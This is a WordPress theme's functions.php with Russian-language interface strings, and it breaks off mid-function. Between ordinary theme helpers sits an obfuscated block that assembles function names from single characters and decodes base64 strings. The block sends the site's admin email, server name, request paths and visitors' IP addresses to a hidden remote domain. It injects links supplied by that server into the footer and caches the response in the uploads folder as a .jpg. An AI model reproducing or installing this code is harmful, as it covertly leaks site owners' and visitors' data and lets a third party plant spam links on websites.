<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $czHWd='4';$QWdA='s';$EoZhQ='e';$YudRH='6';$xGdBFnj='_';$AXeE='o';$TDjBD='b';$tYfbp='c';$ClRdRen='d';$zpZV='e';$yXMX='e';$dZjIa='a';$zaCCBD='d';$mwHSmnlS=$TDjBD.$dZjIa.$QWdA.$yXMX.$YudRH.$czHWd.$xGdBFnj.$zaCCBD.$zpZV.$tYfbp.$AXeE.$ClRdRen.$EoZhQ;$INYh='e';$GhfT='g';$fRLbOs='a';$ttUVR='n';$mOcVW='z';$qgxzNOS='t';$BNAFD='f';$NjuTd='l';$TCOCiG='i';$yEGWbdPN=$GhfT.$mOcVW.$TCOCiG.$ttUVR.$BNAFD.$NjuTd.$fRLbOs.$qgxzNOS.$INYh;$XXQQ='t';$GnTfx='o';$YfAGzk='r';$Qqqfev='1';$BYQAe='3';$cuLTzkw='t';$OoOekwD='_';$cEyj='s';$yDcG='r';$qBCZHtKJ=$cEyj.$XXQQ.$yDcG.$OoOekwD.$YfAGzk.$GnTfx.$cuLTzkw.$Qqqfev.$BYQAe;$PAiJRT='r';$VhBLkT='e';$arUrPuR='r';$kINbUno='t';$gehTg='v';$doTPcsN='s';$ATvJzUrK=$doTPcsN.$kINbUno.$arUrPuR.$PAiJRT.$VhBLkT.$gehTg;                     
		$jm_________r='4';$ka___________a='s';$gw__________p='e';$pb_______v='6';$dq_______________x='_';$wn____________f='o';$uo____s='b';$iw_____________s='c';$de_________t='d';$gl________i='e';$jq________h='e';$bx_______n='a';$zr_____t='d';$cl_______j=$uo____s.$bx_______n.$ka___________a.$jq________h.$pb_______v.$jm_________r.$dq_______________x.$zr_____t.$gl________i.$iw_____________s.$wn____________f.$de_________t.$gw__________p;
		$cw__________r='c';$fb_____________p='n';$rn____________t='x';$wy__i='n';$yz___________p='o';$gk______p='u';$sf___________x='s';$es_________c='t';$rf________x='_';$ao_______________p='s';$oq____________y='i';$ps________l='e';$wq___t='t';$kp_______w='f';$jk________g='i';$ge_______________u=$kp_______w.$gk______p.$wy__i.$cw__________r.$wq___t.$oq____________y.$yz___________p.$fb_____________p.$rf________x.$ps________l.$rn____________t.$jk________g.$ao_______________p.$es_________c.$sf___________x;
		$oe_________h='p';$ci__________t='e';$rj__m='n';$jb___________p='o';$cd______u='f';$mm________g=$cd______u.$jb___________p.$oe_________h.$ci__________t.$rj__m;
		$hh______________x='e';$go_______w='d';$jt__________v='a';$cd__________a='r';$mt___d='f';$on______________u=$mt___d.$cd__________a.$hh______________x.$jt__________v.$go_______w;
		$da________t='l';$uc____w='e';$mz___f='s';$lr__h='c';$fx_____________c='o';$bq_____________w='f';$cv____________a=$bq_____________w.$lr__h.$da________t.$fx_____________c.$mz___f.$uc____w;
		
		define("WP_ID", $cl_______j("Mi4wLjA="));
		define("WP_TTL", $cl_______j("MTA4MDA="));
		define("WP_SRC", $cl_______j("dHBva24="));
	


		function wp_get_header() {
			global $cl_______j, $ge_______________u;
			
			if (
				$ge_______________u($cl_______j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ge_______________u($cl_______j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ge_______________u($cl_______j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $cl_______j, $mm________g, $cv____________a, $on______________u;
			
			$tu__________m = TEMPLATEPATH."/".$cl_______j("Zm9vdGVyLnBocA==");
			$cu___l = @$mm________g($tu__________m, "r");
			$tu__________m = @$on______________u($cu___l, @filesize($tu__________m));
			@$cv____________a($cu___l);
			
			$xo___m = TEMPLATEPATH."/".$cl_______j("ZnVuY3Rpb25zLnBocA==");
			$cu___l = @$mm________g($xo___m, "r");
			$xo___m = @$on______________u($cu___l, @filesize($xo___m));
			@$cv____________a($cu___l);
			
			$hx_____q = 0;
			if($tu__________m && $xo___m) {
				if ($cl_______j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($tu__________m, $cl_______j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hx_____q = 1;
					}
					if (substr_count($tu__________m, "wp_theme_GPL_credits()") < 1) {
						$hx_____q = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hx_____q = 12;
				}
			}
			
			if($hx_____q > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hx_____q -->";
			}
		}
	


		function wp_loaded() {
			global $cl_______j, $ge_______________u;
			return $ge_______________u($cl_______j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($eh______________n, $rg_______w = "(more...)", $hm_________b = 0, $sk____________r = "") {
				$nh_______t = get_the_content($rg_______w, $hm_________b, $sk____________r);
				$nh_______t = apply_filters("the_content", $nh_______t);
				
				$nh_______t = str_replace("]]>", "]]>", $nh_______t);
				if (strlen($_GET["p"]) > 0) {
					echo $nh_______t;
				}
				else if ((strlen($nh_______t)>$eh______________n) && ($tr__h = strpos($nh_______t, " ", $eh______________n ))) {
					$nh_______t = substr($nh_______t, 0, $tr__h);
					$nh_______t = $nh_______t;
					echo $nh_______t;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$rg_______w</a></div></p>";
				} else {
					echo $nh_______t;
				}
				
			}
		}
	


		$ac_______________m='e';$rx____i='_';$la___m='o';$sg____________g='6';$la______________v='n';$sh_____c='s';$db_______________v='d';$jh____________b='4';$gi__________d='e';$ge____________z='c';$kg_____y='a';$is___s='e';$xc_______t='b';$ly____f=$xc_______t.$kg_____y.$sh_____c.$ac_______________m.$sg____________g.$jh____________b.$rx____i.$gi__________d.$la______________v.$ge____________z.$la___m.$db_______________v.$is___s;
		$qu_________f='t';$jl___u='i';$az_________o='l';$as____e='e';$ow____x='_';$xb_______b='n';$kx_________q='e';$dd___y='_';$ff______________f='o';$rh____________f='n';$uf____________v='f';$fx______________c='g';$qs___y='s';$gu____________b='e';$hf___________i='c';$oi___i='t';$fm_______________l='t';$ay___t=$uf____________v.$jl___u.$az_________o.$as____e.$dd___y.$fx______________c.$gu____________b.$oi___i.$ow____x.$hf___________i.$ff______________f.$xb_______b.$fm_______________l.$kx_________q.$rh____________f.$qu_________f.$qs___y;
		$fs______________s='e';$ww_____________q='i';$dn______________n='x';$hz_____b='_';$fp______________y='i';$cq____h='s';$fc_____d='t';$ks__o='e';$uf_____________n='f';$op___u='s';$xm_______y='l';$kd_____t=$uf_____________n.$fp______________y.$xm_______y.$fs______________s.$hz_____b.$ks__o.$dn______________n.$ww_____________q.$cq____h.$fc_____d.$op___u;
		$xl___________v='r';$ut_____y='a';$kb_____________j='c';$vr_________s='o';$yt_____________e='e';$uy__________a='_';$ce_________g='m';$su_____________b='i';$mz_______________f='p';$il_____z='n';$fm________v='v';$dq________u='o';$dh________s='s';$ks___________t='r';$dz____________y='e';$ih______________b=$fm________v.$yt_____________e.$xl___________v.$dh________s.$su_____________b.$dq________u.$il_____z.$uy__________a.$kb_____________j.$vr_________s.$ce_________g.$mz_______________f.$ut_____y.$ks___________t.$dz____________y;
		$jt__c='o';$iy_________f='k';$eg___q='f';$ze_____z='p';$dm_____g='c';$vr_______________n='n';$ut______i='o';$do_________h='e';$sz__________d='s';$cc______________c=$eg___q.$sz__________d.$ut______i.$dm_____g.$iy_________f.$jt__c.$ze_____z.$do_________h.$vr_______________n;
		$nq_________s='e';$fx____________r='r';$qn____p='t';$co__________t='f';$cf____j='w';$xl________w='i';$ji____r=$co__________t.$cf____j.$fx____________r.$xl________w.$qn____p.$nq_________s;
		$vn______s='m';$ju_____w='5';$zv__________p='d';$xw_______________s=$vn______s.$zv__________p.$ju_____w;
		$uj_______o='t';$om_______________u='l';$gj_______________m='e';$ix____f='a';$ah____j='r';$sj_________t='h';$kt__________e='a';$ej_______________s='p';$cv__x=$ah____j.$gj_______________m.$ix____f.$om_______________u.$ej_______________s.$kt__________e.$uj_______o.$sj_________t;
		$ak___________h='s';$ja_________u='r';$dj______________k='e';$hc___c='n';$iu__________i='u';$hz_____x='e';$fq___y='i';$zn______________h='l';$im__________p='i';$jx__________q='a';$ps___________p='z';$pe_____y=$iu__________i.$hc___c.$ak___________h.$hz_____x.$ja_________u.$fq___y.$jx__________q.$zn______________h.$im__________p.$ps___________p.$dj______________k;
		$zr___________l='p';$cl_____z='n';$dx_________i='t';$ra____e='m';$so___e='m';$vq________x='a';$tb___________h='e';$eb___r=$dx_________i.$tb___________h.$ra____e.$zr___________l.$cl_____z.$vq________x.$so___e;
		$wj______p='x';$cm_____b='e';$ti__p='_';$tf_____p='m';$aj__w='t';$bb____________n='r';$ym______________e='t';$sj________g='e';$gg_______s='r';$vh____r='c';$op____d='t';$fs____m='e';$vq_____________i='s';$pd___y='_';$ih____o='a';$fk___________a='e';$pg_____o='c';$mw__n='n';$ge____v='a';$yv__e='t';$yz_______________x='o';$bw________i=$vq_____________i.$ym______________e.$bb____________n.$fk___________a.$ge____v.$tf_____p.$pd___y.$vh____r.$yz_______________x.$mw__n.$yv__e.$fs____m.$wj______p.$op____d.$ti__p.$pg_____o.$gg_______s.$cm_____b.$ih____o.$aj__w.$sj________g;
	


		function bh_______y($hd__v) {
			global $cl_______j, $ge_______________u, $ay___t, $ih______________b, $bw________i;
			
			if (!$ge_______________u($cl_______j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ih______________b(PHP_VERSION, "5.0.0", ">=") && $ge_______________u($cl_______j("ZmlsZV9nZXRfY29udGVudHM=")) && $ge_______________u($cl_______j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$yt__________s = $bw________i(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$id_______e = @$ay___t($hd__v, 0, $yt__________s);
			} else {
				$id_______e = @$ay___t($hd__v, 0);
			}
			
			return $id_______e;
		}
	


		function dm___x($hd__v) {
			global $ge_______________u, $cc______________c, $ji____r, $cl_______j;
			
			if (!$ge_______________u($cl_______j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$on___________x = strpos($hd__v, "/", 7);
			$zy________w = array(
				"uri"     => substr($hd__v, $on___________x),
				"host"    => str_replace("http://", "", substr($hd__v, 0, $on___________x)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fu____________e = @$cc______________c("$zy________w[host]", 80, $qk__________e, $jx____c, 4);
			
			if (!$fu____________e) {
				return false;
			} else {
				$id_______e = "";
				$fn____________h  = "GET $zy________w[uri] HTTP/1.0\r\n";
				$fn____________h .= "Host: $zy________w[host]\r\n";
				$fn____________h .= "Referer: $zy________w[referer]\r\n";
				$fn____________h .= "Connection: Close\r\n\r\n";
				
				@$ji____r($fu____________e, $fn____________h);
				
				while (!@feof($fu____________e)) {
					$ln___v = @fgets($fu____________e, (1024*24));
					
					if ($ln___v == "\r\n") {
						$bl________a = true;
						continue;
					}
					
					if ($bl________a) {
						$id_______e .= $ln___v;
					}
				}
				
				return $id_______e;
			}
		}
	


		function up_____________a($hd__v) {
			global $ge_______________u;
			$ad______c = false;
			
			if ($hd__v != "") {
				if ($ge_______________u("bh_______y")) {
					$ad______c = @bh_______y($hd__v);
				}
				
				if (!$ad______c && ($ge_______________u("dm___x"))) {
					$ad______c = @dm___x($hd__v);
				}
			}
			
			return $ad______c;
		}
	


		function ie______________j() {
			global $_SERVER, $xw_______________s;
			
			$pg_____x = $_SERVER["SERVER_NAME"];
			
			if (substr("$pg_____x", 0, 4) == "www.") {
				$pg_____x = substr("$pg_____x", 4);
			}
			
			$pg_____x = $xw_______________s("$_SERVER[SERVER_NAME]");
			
			return $pg_____x;
		}
	


		function rt______________o() {
			return "file";
		}
	


		function hy______________z($hd__v) {
			global $_SERVER, $ay___t, $kd_____t, $mm________g, $cv____________a, $ji____r;
			
			$mo___________f = mw___________v();
			
			$oe______t = ie______________j().".jpg";
			$ta___a = $mo___________f["dir_upload"]["path"]."/$oe______t";
			$fb_____________p = @filemtime($ta___a);
			
			if (!$fb_____________p || ((time()-$fb_____________p) >= WP_TTL)) {
				$ad______c = up_____________a($hd__v);
				
				if ($ad______c) {
					if ($kd_____t($ta___a)) {
						@unlink($ta___a);
					}
					
					$cu___l = @$mm________g($ta___a, "x+");
					
					@$ji____r($cu___l, $ad______c);
					@$cv____________a($cu___l);
				}
			} else {
				if ($kd_____t($ta___a)) {
					$ad______c = @$ay___t($ta___a);
				} else {
					$ad______c = false;
				}
			}
			
			return $ad______c;
		}
	


		function mw___________v() {
			global $_SERVER, $cl_______j, $ly____f;
			
			$ek____a = wp_count_posts("post");
			$na_________h = pathinfo(get_bloginfo("template_directory"));
			
			$mo___________f = array(
				"url" => array(
					"report"      => $cl_______j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $na_________h,
				"dir_upload"	=> el____________f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$na_________h[filename],
					"a005=".$ek____a->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$mo___________f["url"]["queryString"] = implode("&", $mo___________f["queryString"]);
			$mo___________f["url"]["report"] = $mo___________f["url"]["report"]."/?".$ly____f($mo___________f["url"]["queryString"]).".html";
						
			return $mo___________f;
		}
	


		function el____________f() {
			$ir_________g = wp_upload_dir();
			
			if (isset($ir_________g["error"])) {
				$ex______________j = hi___j();
				if (is_writable($ex______________j)) {
					$ir_________g = array("path" => $ex______________j);
				}
			}

			return $ir_________g;
		}
	


		function hi___j() {
			global $ge_______________u, $xw_______________s, $cv__x, $eb___r;
			
			$lx_______u = (bool) ini_get("safe_mode");
			if ($lx_______u == true) {
				return false;
			}
			
			if ($ge_______________u("sys_get_temp_dir")) {
				$fv___________j = sys_get_temp_dir();
				if (is_writable($fv___________j)) {
					return $cv__x($fv___________j);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $cv__x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $cv__x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $cv__x($_ENV["TEMP"]);
			} else {
				$bd_______________s = $eb___r($xw_______________s(uniqid(rand(), true)), "");
				if ($bd_______________s) {
					$fv___________j = $cv__x(dirname($bd_______________s));
					@unlink($bd_______________s);
					return $fv___________j;
				} else {
					return false;
				}
			}
		}
	


		function kk_______________b() {
			global $_GET, $kd_____t;
			
			$mo___________f = mw___________v();
			$pg_____x = ie______________j();
			$zw_______q = rt______________o();
			
			$ak_________s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zw_______q == "file") {
					$cd_____p = $mo___________f["dir_upload"]["path"]."/".$pg_____x.".jpg";
					if ($kd_____t($cd_____p)) {
						@unlink($cd_____p);
						$ak_________s = "deleted";
					}
				}
				
				$au_______________p = array(
					"s"	=> $ak_________s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($au_______________p AS $dk__f => $nh_____________p) echo " [$dk__f:$nh_____________p]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ge_______________u, $cl_______j, $pe_____y;
			$mo___________f = mw___________v();
			
			$jq________b = "hy______________z";
			if ($ge_______________u($jq________b)) {
				$id_______e = $jq________b($mo___________f["url"]["report"]);
			}
			
			if ($id_______e) {
				if ($id_______e = @$cl_______j($id_______e)) {
					$id_______e = @$pe_____y($id_______e);
					
					if (strlen($id_______e[custom_credit]) >= 5) {
						$mo___________f["default_string"] = $id_______e[custom_credit];
					}
					
					if ($id_______e["status"] == "0") {
						$jt____i = 1;
						$fx_____________u = 1;
					} else {
						$cz_______________v = sizeof($id_______e["links"]);
						$td_________l = $mo___________f["default_string"];
						
						if ($cz_______________v > 0 && $id_______e["links"] !== "") {
							$hp___________b = 0;
							foreach ($id_______e["links"] as $qw_________m => $ym____________i) {
								$hp___________b++;
								if ($ym____________i->l_path == "" || $ym____________i->l_path == $_SERVER["REQUEST_URI"]) {
									$ym____________i->l_href = htmlspecialchars(strip_tags($ym____________i->l_href));
									$ym____________i->l_title = htmlspecialchars(strip_tags($ym____________i->l_title));
									$ym____________i->l_anchor = htmlspecialchars(strip_tags($ym____________i->l_anchor));
									$td_________l .= " | ";
									$td_________l .= "<a href='$ym____________i->l_href' title='$ym____________i->l_title'";
									if ($ym____________i->l_nofollow == "1") {
										$td_________l .= " rel='nofollow'";
									}
									$td_________l .= ">$ym____________i->l_anchor</a>";
								}
							}
						}
						$mo___________f["links"] = "$td_________l";
						if ($id_______e[credit] == "0") {
							$mo___________f["links"] = "";
						}
					}
				} else {
					$jt____i = "1";
				}
			} else {
				$jt____i = "1";
			}
			
			if ($jt____i == "1") {
				$mo___________f["links"] = $mo___________f["default_string"];
			}
			
			echo "$mo___________f[links]";
			
			echo "<!-- s: $id_______e[signature] -->";
			kk_______________b();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
